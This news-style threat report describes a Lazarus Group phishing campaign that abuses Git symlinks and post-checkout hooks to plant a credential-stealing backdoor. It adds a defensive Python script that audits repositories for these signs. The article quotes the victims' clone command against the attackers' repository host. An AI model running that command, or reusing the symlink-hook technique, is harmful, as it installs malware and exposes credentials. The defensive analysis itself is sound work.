
Lazarus Group Exploits Git Symlink Vulnerability in Advanced Phishing Campaign

Earlier this month, cybersecurity researchers identified a sophisticated phishing campaign linked to the Lazarus Group, specifically targeting developers and cryptocurrency professionals through a cleverly engineered Git symlink vulnerability. Instead of relying on conventional malware distribution methods, the attackers exploited Git's handling of repository paths, embedding malicious hooks behind symbolic links so that code executes during standard operations. This approach lets the attackers remain inconspicuous while compromising high-value targets who mistakenly believe their development processes are safe from social engineering. The initial bait is a personalised message on a professional networking platform inviting the potential victim to take part in a mock technical interview. The conversation is designed to build trust and persuade the victim to run a single `git clone` command against a repository that contains a deceptive nested directory named `api/db_drivers`, which is actually a symbolic link pointing back into the repository's own `.git` directory.

The attack vector was first noted by KuCoin analysts in late August, following reports of compromised private GitLab repositories. A detailed analysis revealed that the symlink exploit takes advantage of Git's post-checkout hook mechanism to activate a concealed backdoor. By placing a malicious post-checkout script behind the symbolic link, the attackers can execute code without altering the main codebase, thereby evading standard integrity checks and static scanners. Forensic investigations confirmed that the payload establishes an encrypted connection to a remote command-and-control server and exfiltrates credentials, system information, and wallet data to the attackers. The exploit's sophistication lies in its seamless integration with legitimate workflows: victims reported that running `git clone --recursive https://guest:glpat-2xxxxxxyx@gitlab.tresalabs.com/product/delivery.git` followed by `cd product/delivery` automatically triggers the malicious hook. The embedded script, `hooks/post-checkout`, invokes a Node.js backdoor that maintains persistence by cleaning and replacing project files to obscure any signs of tampering, ensuring developers only see the expected code.
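The two warning signs the article describes, a symlink in the checkout that resolves into the repository's own `.git` directory and a hook-named file committed in the working tree, can be checked for mechanically before anyone runs a build. The script below is an added example, not code from the article, from KuCoin or from the campaign; it assumes a POSIX filesystem, takes the directory names `api/db_drivers` and `hooks/post-checkout` from the article, and builds a constructed sample tree in a temp directory rather than cloning anything. The hardened clone command it prints relies on two standard Git settings: `core.hooksPath` pointed at an empty location so no hook file can be found during checkout, and `core.symlinks=false` so symlinks are written out as plain files instead of links.

```python
"""Audit a cloned Git working tree for symlinks that resolve into .git and
for hook-named files committed in the tree (added example, not the article's)."""
import os
import tempfile
from pathlib import Path

# Hook names Git runs on its own during everyday operations (clone, merge, commit, push).
HOOK_NAMES = {
    "post-checkout", "post-merge", "post-commit", "pre-commit", "pre-push",
    "post-rewrite", "prepare-commit-msg", "pre-auto-gc",
}


def _resolve_link(link: Path) -> Path:
    """Resolve a symlink's target relative to the link's own directory."""
    raw = Path(os.readlink(link))
    target = raw if raw.is_absolute() else link.parent / raw
    return target.resolve(strict=False)


def _inside(path: Path, parent: Path) -> bool:
    return path == parent or parent in path.parents


def _walk_checkout(repo: Path):
    """os.walk over the working tree, never descending into the real .git or into links."""
    git_dir = repo / ".git"
    for root, dirs, files in os.walk(repo):  # followlinks=False by default
        dirs[:] = [d for d in dirs if Path(root, d) != git_dir]
        yield Path(root), dirs, files


def find_git_dir_symlinks(repo: Path) -> list[str]:
    """Relative paths of symlinks (file or dir) whose target lands inside <repo>/.git."""
    repo = repo.resolve()
    git_dir = repo / ".git"
    hits = []
    for root, dirs, files in _walk_checkout(repo):
        for name in dirs + files:
            p = root / name
            if p.is_symlink() and _inside(_resolve_link(p), git_dir):
                hits.append(str(p.relative_to(repo)))
    return sorted(hits)


def find_committed_hooks(repo: Path) -> list[str]:
    """Relative paths of files carrying a Git hook name under any 'hooks' directory."""
    repo = repo.resolve()
    hits = []
    for root, _dirs, files in _walk_checkout(repo):
        if root.name == "hooks":
            for f in files:
                if f.split(".", 1)[0] in HOOK_NAMES:
                    hits.append(str((root / f).relative_to(repo)))
    return sorted(hits)


def audit(repo: Path) -> dict[str, list[str]]:
    return {
        "git_dir_symlinks": find_git_dir_symlinks(repo),
        "committed_hooks": find_committed_hooks(repo),
    }


def hardened_clone_argv(url: str, dest: str) -> list[str]:
    """argv for a clone that cannot run a committed hook and writes symlinks as plain files."""
    return ["git", "clone", "-c", "core.hooksPath=/dev/null",
            "-c", "core.symlinks=false", "--", url, dest]


def build_demo_repo() -> Path:
    """Constructed sample tree laid out like the article's description (not a real clone)."""
    repo = Path(tempfile.mkdtemp(prefix="symlink-audit-"))
    (repo / ".git" / "hooks").mkdir(parents=True)
    (repo / "src").mkdir()
    (repo / "src" / "index.js").write_text("console.log('hello');\n")
    (repo / "api").mkdir()
    # The suspicious entry: api/db_drivers -> ../.git (relative link, as in the article).
    os.symlink(Path("..") / ".git", repo / "api" / "db_drivers")
    # A hook-named file sitting in the checkout; contents are an inert placeholder.
    (repo / "hooks").mkdir()
    (repo / "hooks" / "post-checkout").write_text("#!/bin/sh\necho placeholder\n")
    # A benign relative symlink, to show ordinary links are not flagged.
    os.symlink(Path("..") / "src" / "index.js", repo / "api" / "index.js")
    return repo


if __name__ == "__main__":
    demo = build_demo_repo()
    for kind, paths in audit(demo).items():
        print(f"{kind}: {paths}")
    print(" ".join(hardened_clone_argv("https://example.invalid/repo.git", "repo")))
```

Run it on a real checkout with `audit(Path("product/delivery"))`; anything in `git_dir_symlinks` means the tree can write into Git's own metadata and should be treated as hostile, and `committed_hooks` lists files that would become live hooks if they ever land in `.git/hooks`. The `hardened_clone_argv` settings are per-clone `-c` overrides; the same two keys can be set globally with `git config --global` for developers who routinely clone repositories from interview or recruitment contacts.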

Categories: Cybersecurity Threats, Phishing Attacks, Software Vulnerabilities 

Tags: Phishing, Lazarus Group, Git Symlink, Malicious Hooks, Code Execution, Social Engineering, Backdoor, Command-and-Control, Credential Theft, Exploit 
